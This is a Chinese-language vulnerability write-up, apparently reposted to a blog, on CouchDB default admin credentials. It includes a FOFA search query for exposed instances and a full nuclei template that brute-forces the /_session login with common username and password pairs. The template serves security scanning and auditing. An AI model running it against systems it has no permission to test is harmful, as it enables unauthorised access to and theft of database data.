CouchDB 默认登录漏洞

漏洞信息

漏洞名称: CouchDB 默认登录漏洞

漏洞类型: 弱口令

漏洞等级: 高危

漏洞描述: CouchDB是一个开源的NoSQL数据库,由Apache软件基金会维护,广泛用于Web应用程序和分布式系统中,因其易于使用和灵活性而受到开发者的青睐。该漏洞涉及CouchDB的默认登录凭证问题,攻击者可以利用这些弱口令轻易获取管理员权限。漏洞的技术根源在于CouchDB安装后未强制修改默认的管理员用户名和密码,导致攻击者可以通过简单的暴力破解或尝试常见默认凭证组合来获得访问权限。这种配置问题属于常见的安全疏忽,但影响深远。一旦攻击者成功登录,他们可以执行任意操作,包括读取、修改或删除数据库中的敏感信息,甚至可能进一步利用系统权限进行更广泛的攻击。由于此漏洞不需要任何前置条件或认证即可利用,且存在公开的利用脚本,因此其风险等级被评定为高危。企业应立即检查并修改所有CouchDB实例的默认凭证,以防止潜在的安全威胁。

产品厂商: apache

产品名称: couchdb

影响版本: *

搜索语法: app=”APACHE-CouchDB”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/d694ffeb6baa526904249ded765790e5726c0b03/http%2Fdefault-logins%2Fcouchdb%2Fcouchdb-default-login.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83

id: couchdb-default-login

info:
name: CouchDB - Default Login
author: thefoggiest
severity: high
description: |
CouchDB weak admin credentials were discovered.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 17
fofa-query: app="APACHE-CouchDB"
product: couchdb
vendor: apache
tags: default-login,couchdb,misconfig

flow: http(1) && http(2)

http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}

matchers:
- type: word
words:
- "CouchDB"
- "couchdb"
condition: or
internal: true

- raw:
- raw:
- |
POST /_session HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

name={{username}}&password={{password}}

payloads:
username:
- admin
- administrator
- couchdb
- root
password:
- admin
- test
- password
- couchdb
attack: clusterbomb

stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{"ok":true'
- '"name":"'
- '"roles":['
condition: and

- type: word
part: header
words:
- application/json
- AuthSession=
condition: and

- type: status
status:
- 200
# digest: 490a0046304402203f3ec75adc438ac984b9c86563936bdf149314625706cfec942efcf94ac237da022058abfe0d3dc0b492e05cfb13e2474a9a559f20c6f19f33c41c8f3a4772ed017e:922c64590222798bb761d5b6d8e72950


CouchDB 默认登录漏洞
http://example.com/2025/07/21/github_1441586828/
作者
lianccc
发布于
2025年7月21日
许可协议